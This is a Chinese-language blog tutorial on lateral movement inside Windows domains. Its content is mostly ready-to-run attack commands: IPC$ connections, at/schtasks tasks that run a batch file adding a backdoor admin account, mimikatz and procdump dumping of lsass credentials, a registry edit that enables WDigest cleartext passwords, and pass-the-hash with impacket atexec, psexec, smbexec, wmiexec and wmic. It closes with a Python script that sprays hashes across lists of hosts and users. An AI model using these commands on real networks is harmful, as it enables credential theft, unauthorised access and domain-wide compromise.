内网渗透-横向渗透1

1.横向渗透明文传递 at&schtasks

​ 在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。

获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户 名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或 者相关命令

利用流程

  1. 建立 IPC 链接到目标主机
  2. 拷贝要执行的命令脚本到目标主机
  3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
  4. 删除 IPC 链接

建立 IPC 常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

(2)51:网络问题,Windows 无法找到网络路径

(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题

(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$

(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除

(6)1326:账号密码错误

(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况

(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

建立 IPC 失败的原因

(1)目标系统不是 NT 或以上的操作系统

(2)对方没有打开 IPC$共享

(3)对方未开启 139、445 端口,或者被防火墙屏蔽

(4)输出命令、账号密码有错误

net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除 IPC
net view xx.xx.xx.xx # 查看对方共享

使用环境

at 适用于 Windows2012 以下版本

schtasks 使用于 Windows2012及 以上版本

at 命令使用

net use \\192.168.1.21\ipc$ "password" /user:xy.com\administrator
# 建立 ipc 连接:copy add.bat \\192.168.3.21\c$
#拷贝执行文件到目标机器at \\192.168.3.21 15:47 c:\add.bat
#添加计划任务

schtasks命令使用

net use \\192.168.3.32\ipc$ "password" /user:xy.com\administrator
# 建立 ipc 连接:copy add.bat \\192.168.1.1\c$
#复制文件到其 C 盘schtasks /create /s 192.168.1.1 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F
#创建 adduser 任务对应执行文件schtasks /run /s 192.168.1.1 /tn adduser /i
#运行 adduser 任务schtasks /delete /s 192.168.1.11 /tn adduser /f
#删除 adduser 任务

2.实例演示:

首先进入某域主机,

1.使用:

net time /domain     #获取当前域控主机名称

2.获取域控主机ip地址

nslookup DD.xy.com       #获取域控主机ip地址
ping 域控主机            #两种方式都行

3.接下来使用at命令或者schtasks命令

net use \\192.168.1.100\ipc$ "123456" /user:xy.com\administrator # 建立 ipc 连接:
copy add.bat \\192.168.1.21\c$ #拷贝执行文件到目标机器
at \\192.168.1.21 15:47 c:\add.bat #添加计划任务
add.bat文件内容
net user admin password /add        #添加用户名密码

4.实战时用mimikatz获取密码

在DOS运行界面中输入

privilege::debug             提权命令
sekurlsa::logonpasswords        抓取密码命令

找到密码后我们来验证下密码是否正确,打开控制面板输入原来的密码看能否修改,如果能修改就是正确的密码

另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

导出为lsass.dump文件
把lsass.dmp放在mimikatz目录利用

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

这样就读出了密码的sha1加密的密码

3.其他案例

1.横向渗透明文 HASH 传递 atexec-impacket(会被杀毒软件查杀)

atexec.exe ./administrator:password@192.168.1.1 "whoami"              #password处输入密码
atexec.exe god/administrator:password@192.168.1.1 "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.1.1 "whoami"

2.横向渗透明文 HASH 传递批量利用-综合

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "password" /user:administrator
#批量检测 IP 对应明文连接         #保存文件后缀名.bat,批处理文件FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password@%%i whoami
#批量检测 IP 对应明文回显版FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami
#批量检测明文对应 IP回显版FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami
#批量检测HASH 对应 IP 回显版

2.域横向 smb&wmi 明文或 hash 传递

知识点1:
Windows2012以上版本默以关闭wdigest, 攻击者无法从内存中获取明文密码

Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  • 利用哈希hash传递(pth, pt k等)进行移动
  • 利用其它服务协议( SMB, WMI等)进行哈希移动
  • 利用注册表操作开启wdigest Auth值进行获取
  • 利用工具或第三方平台(Hachcat)进行破解获取

知识点2:

Windows系统LM Hash及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows 2003以后,认证方式均为NTLM Hash

注册表修改

reg add
HKLM\ SYSTEM\CurrentControlSet\Control\SecurityProvidears\WDigest /v UseLogonCredential /t REG DWORD /d 1 /f

1. Procdump+Mimikatz 配合获取

procdump -accepteula -ma lsass.exe lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp mimikatz 上执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

2.Hashcat 破解获取 Windows NTML Hash

hashcat -a 0-m 1000hash file --force

参考:

https://www.freebuf.com/sectool/164507.html

3.域横向移动 SMB 服务利用-psexec,smbexec

psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递

net use \\192.168.1.1\ipc$ "password" /user:administratorpsexec \\192.168.1.1 -s cmd       # 需要先有 ipc 链接 -s 以 System 权限运行

psexec 第二种:不用建立 IPC 直接提供明文账户密码(推荐使用第二种)

psexec \\192.168.1.1 -u administrator -p Admin12345 -s cmd   #有账号密码psexec -hashes :$HASH$ ./administrator@10.10.10.10
psexec -hashes :$HASH$ domain/administrator@10.10.10.10
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1
官方 Pstools 无法采用 hash 连接
需要非官方自带-参考 impacket 工具包使用,操作简单,容易被杀
https://gitee.com/RichChigga/impacket-examples-windows

smbexec 无需先 ipc 链接 明文或 hash 传递

smbexec god/administrator:Admin12345@192.168.1.1
smbexec ./administrator:admin!@#45@192.168.1.1smbexec -hashes :$HASH$ ./admin@192.168.1.1
smbbexec -hashes :$HASH$ domain/admin@192.168.1.1
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1
smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.1.1

4.域横向移动 WMI 服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

自带 WMIC 明文传递 无回显

wmic /node:192.168.1.1 /user:administrator /password:Admin12345 process call create "cmd.exe /c
ipconfig >C:\1.txt"

自带 cscript 明文传递 有回显

cscript //nologo wmiexec.vbs /shell 192.168.1.1 administrator Admin12345

套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin!@#45@192.168.1.1 "whoami"
wmiexec god/administrator:Admin12345@192.168.1.1 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.1.1 "whoami"

5.域横向移动以上服务 hash 批量利用-python 编译 exe

pyinstaller.exe -F fuck_neiwang_002.py
import os,time
ips={
'192.168.1.1',
'192.168.1.2',
'192.168.1.3',
'192.168.1.4',
'192.168.1.5'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:for user in users:for mimahash in hashs:
#wmiexec -hashes :hashgod/user@ipwhoamiexec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"print('--->' + exec + '<---')os.system(exec)time.sleep(0.5)

内网渗透-横向渗透1相关推荐

  1. 内网渗透-横向渗透2

    内网渗透-横向渗透2 1.域横向 PTH&PTK&PTT 哈希票据传递 1.域横向移动 PTH 传递 PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测 ...

  2. 内网域横向PTHPTKPTT哈希票据传递

    内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...

  3. 内网渗透-内网代理穿透和内网横向移动

    内网代理穿透和内网横向移动 文章目录 内网代理穿透和内网横向移动 前言 内网代理穿透 nc termite(ew) ssh正向代理(A,B,C) msf设置路由和sock4代理访问内网流量 内网横向移 ...

  4. 我猜你也在找内网渗透,这篇难道还不够你嚼烂?

    内网渗透 前言 1.实验简介 网络拓扑图 2.环境搭建 第一层网络 第二层网络 第三层网络 最后 第一台Linux 第二台Linux 3.实验过程 第一层靶机 蚁剑连接 进一步做内网渗透,上传msf后 ...

  5. 一个实验了解多层内网渗透

    原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防.因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗 ...

  6. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

  7. 0x02 内网渗透篇

     来源如下图:(微信公众号:0x00实验室) 00 - 内网渗透的流程 拿到跳板后,先探测一波内网存活主机,用net user /domian命令查看跳板机是否在域内,探测存活主机.提权.提取hash ...

  8. 【内网安全】域横向内网漫游Socks代理隧道技术

    代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp.ngrok和ew等,ew(earthwo ...

  9. 渗透知识-内网渗透(详细版本)

    1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看 ...

最新文章

  1. simple java mail
  2. android通过代码设置铃声_第六十四回:Android中UI控件之SeekBar
  3. mysql的unique_MySQL使用UNIQUE实现数据不重复插入
  4. 使用命令行开始你的netcore之路
  5. 华为Mate50渲染图曝光:经典奥利奥相机模组
  6. mybatis开启log_mybatis使用spring-druid数据源连接池配置log4j打印sql语句以及开启监控平台...
  7. 修改 Windows Host 文件工具
  8. 设置内外网同时使用,重新配置路由
  9. 【精品字体】我有故事你有酒么字体
  10. 解决POI导出Excel单元格内容换行问题
  11. html5 canvas画彩虹,HTML5/Canvas连接的彩虹点平滑动画
  12. 惠普台式计算机系统系统修复,一键恢复系统,详细教您怎么一键恢复惠普笔记本系统...
  13. Java代码实现使用while循环接受键盘的输入,如果输入的exit就退出,否则提示用户继续输入
  14. 抖音快手民俗的作品制作方法
  15. .net core 3.1 WebApi项目/Swagger支持二级目录
  16. CSS3中的transition和transform属性
  17. 怎么判断日出时间早晚_日出日落时间早晚比较
  18. Java连接sqlserver数据库,并进行增删改查操作
  19. 神经网络(六)循环神经网络
  20. Mysql 为什么默认定义varchar(255) 而不是varchar(256)

热门文章

  1. Adobe Acrobat 给pdf添加多级书签(制作目录)
  2. Zabbix监控深信服Sangfor设备
  3. 班主任对学生的成绩分析
  4. 计算机科学与技术导师保研推荐信,研究生推荐信共篇
  5. 工模插拔耳机电流声问题修改
  6. 单片机的入门-51单片机
  7. crosswalk 初步使用
  8. HDLBits:在线学习Verilog(七 · Problem 30-34)
  9. ASR:语音识别(闻食物声辨物)cnn与xgboost两个方法
  10. 中国传统色彩样本与描述--实用设计色谱